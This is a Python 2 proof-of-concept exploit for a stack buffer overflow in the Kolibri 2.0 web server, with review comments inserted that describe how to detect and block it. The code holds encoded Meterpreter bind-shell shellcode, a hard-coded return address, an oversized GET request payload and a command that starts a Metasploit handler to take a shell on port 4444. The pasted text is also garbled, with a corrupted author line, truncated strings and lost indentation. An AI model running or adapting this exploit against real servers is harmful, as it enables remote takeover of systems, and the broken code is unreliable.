  1. Proof of concept for a stack buffer overflow in the Kolibri 2.0 web server, triggered by an over-long GET request; the payload opens a bind shell listening on TCP/4444.
  2.  
  3.  
  4. #!/usr/bin/python
  5. # Exploit Title: Kolibri GET request Stack buffer Overflow
# NOTE(review): Python 2 proof of concept, reproduced as pasted. The paste has lost
# its indentation and two of the banner strings below are cut off mid-literal, so
# treat this text as a description of the request seen on the wire rather than as
# a runnable program.
# Defender's summary: one oversized GET (~590-byte request-target containing 0x90
# and non-ASCII bytes) against the server named in the title, followed by a new
# listener on TCP/4444 on the victim.  Both are straightforward to alert on; a
# request-line length cap on a reverse proxy in front of the server blocks the
# trigger, and the hard-coded return address below ties the PoC to the single
# OS build listed under "Tested on".
  6.  
  7.  
  8.  
  9. # Exploit Authommmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
  10. # Tested on: Windows XP SP3,
  11. # A buffer overflow is triggered when a long GET command is sent to the server.
  12.  
  13. import socket, sys, os, time
  14.  
# Argument check; the usage banner is in Spanish: "<victim IP> <port>".
  15. if len(sys.argv) != 3:
  16. print "[*] Uso: %s <Ip Victima> <Puerto> \n" % sys.argv[0]
  17. print "[*] Exploit created by
  18. print "[*] https://www.in
  19. sys.exit(0)
  20. host = sys.argv[1]
  21. port = int(sys.argv[2])
  22.  
# Encoded Metasploit bind_tcp payload, generated by the command in the comment
# below.  The bytes excluded with -b (NUL, 0xff, LF, CR, space, '@') are
# presumably ones the server's request-line parsing would treat specially —
# not verifiable from this file.
# Detection note: this stub is a long run of high/non-printable bytes inside the
# URL path of a single GET; an HTTP-aware IDS rule on non-ASCII bytes in the
# request-target catches it.
  23. #./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -b '\x00\xff\x0a\x0d\x20\x40'
  24. shellcode = (
  25. "\x29\xc9\x83\xe9\xb5\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
  26. "\xaa\x86\x33\x5f\x83\xee\xfc\xe2\xf4\x56\x6e\xba\x5f\xaa\x86"
  27. "\x53\xd6\x4f\xb7\xe1\x3b\x21\xd4\x03\xd4\xf8\x8a\xb8\x0d\xbe"
  28. "\x0d\x41\x77\xa5\x31\x79\x79\x9b\x79\x02\x9f\x06\xba\x52\x23"
  29. "\xa8\xaa\x13\x9e\x65\x8b\x32\x98\x48\x76\x61\x08\x21\xd4\x23"
  30. "\xd4\xe8\xba\x32\x8f\x21\xc6\x4b\xda\x6a\xf2\x79\x5e\x7a\xd6"
  31. "\xb8\x17\xb2\x0d\x6b\x7f\xab\x55\xd0\x63\xe3\x0d\x07\xd4\xab"
  32. "\x50\x02\xa0\x9b\x46\x9f\x9e\x65\x8b\x32\x98\x92\x66\x46\xab"
  33. "\xa9\xfb\xcb\x64\xd7\xa2\x46\xbd\xf2\x0d\x6b\x7b\xab\x55\x55"
  34. "\xd4\xa6\xcd\xb8\x07\xb6\x87\xe0\xd4\xae\x0d\x32\x8f\x23\xc2"
  35. "\x17\x7b\xf1\xdd\x52\x06\xf0\xd7\xcc\xbf\xf2\xd9\x69\xd4\xb8"
  36. "\x6d\xb5\x02\xc2\xb5\x01\x5f\xaa\xee\x44\x2c\x98\xd9\x67\x37"
  37. "\xe6\xf1\x15\x58\x55\x53\x8b\xcf\xab\x86\x33\x76\x6e\xd2\x63"
  38. "\x37\x83\x06\x58\x5f\x55\x53\x63\x0f\xfa\xd6\x73\x0f\xea\xd6"
  39. "\x5b\xb5\xa5\x59\xd3\xa0\x7f\x11\x02\x84\xf9\xee\x31\x5f\xbb"
  40. "\xda\xba\xb9\xc0\x96\x65\x08\xc2\x44\xe8\x68\xcd\x79\xe6\x0c"
  41. "\xfd\xee\x84\xb6\x92\x79\xcc\x8a\xf9\xd5\x64\x37\xde\x6a\x08"
  42. "\xbe\x55\x53\x64\xc8\xc2\xf3\x5d\x12\xcb\x79\xe6\x35\xaa\xec"
  43. "\x37\x09\xfd\xee\x31\x86\x62\xd9\xcc\x8a\x21\xb0\x59\x1f\xc2"
  44. "\x86\x23\x5f\xaa\xd0\x59\x5f\xc2\xde\x97\x0c\x4f\x79\xe6\xcc"
  45. "\xf9\xec\x33\x09\xf9\xd1\x5b\x5d\x73\x4e\x6c\xa0\x7f\x87\xf0"
  46. "\x76\x6c\x03\xc5\x2a\x46\x45\x33\x5f"
  47. )
  48.  
# Request-target layout: nop + shellcode + junk is padded to exactly 515 bytes,
# then the 4-byte overwritten return address, an 11-byte stub and 60 filler
# bytes — about 590 bytes in the path of a single GET.  A request line of that
# length carrying 0x90 and non-ASCII bytes is an easy signature.  The address in
# `eip` is a fixed constant, so the PoC only works against the exact build named
# in "Tested on" (a platform without ASLR); later Windows releases with ASLR/DEP
# break this technique.
  49. nop = "A" * 33 + '\x90' * 20
  50. junk = "C" *(515-(len(nop)+len(shellcode)))
  51. opcode= "\x83\xc4\x44\x83\xc4\x44\x83\xc4\x44\xff\xe4"
  52. eip = '\x63\x46\x92\x7c'
  53. #7c86467b 7C924663 call esp
  54. buffer = nop + shellcode + junk + eip + opcode + "B" * 60
  55.  
# One plain HTTP/1.1 GET with the oversized path; the remaining headers are
# ordinary browser-looking values, so the request-target is the only anomaly.
  56. req = ("GET /" + buffer + " HTTP/1.1\r\n"
  57. "Host: " + host + ":" + str(port) + "\r\n"
  58. "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
  59. "Connection: keep-alive\r\n\r\n")
  60. print " [+] Connecting to %s:%d" % (host, port)
  61. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  62.  
# Single shot: connect, send the request, read up to 1024 bytes of whatever
# comes back, close, then after a 3 s pause shell out to a Metasploit handler
# for the bind listener.  Any exception raised inside this block falls through
# to the bare except below, which prints one generic message and exits.
  63. try:
  64. s.connect((host, port))
  65. print " [+] Sending payload.." + "nop: " + str(len(nop)) + " junk: " + str(len(junk)) + " shellcode: " + str(len(shellcode))
  66. s.send(req)
  67. data = s.recv(1024)
  68. print " [+] Closing connection.."
  69. s.close()
  70. print "[+] Exploit Sent Successfully"
  71. print "[+] Waiting for 3 sec before spawning shell to " + host + ":4444\r"
  72. print "\r"
  73. time.sleep(3)
  74. os.system("msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.0.106 LPORT=4444 E")
  75. print "[-] Connection lost from " + host + ":4444 \r"
# Bare except: every failure (DNS, refused connection, send/recv error) is
# reported as "could not connect"; the socket is not closed on this path.
  76. except:
  77. print "[-] Could not connect to " + host + ":4444\r"
  78. sys.exit(0)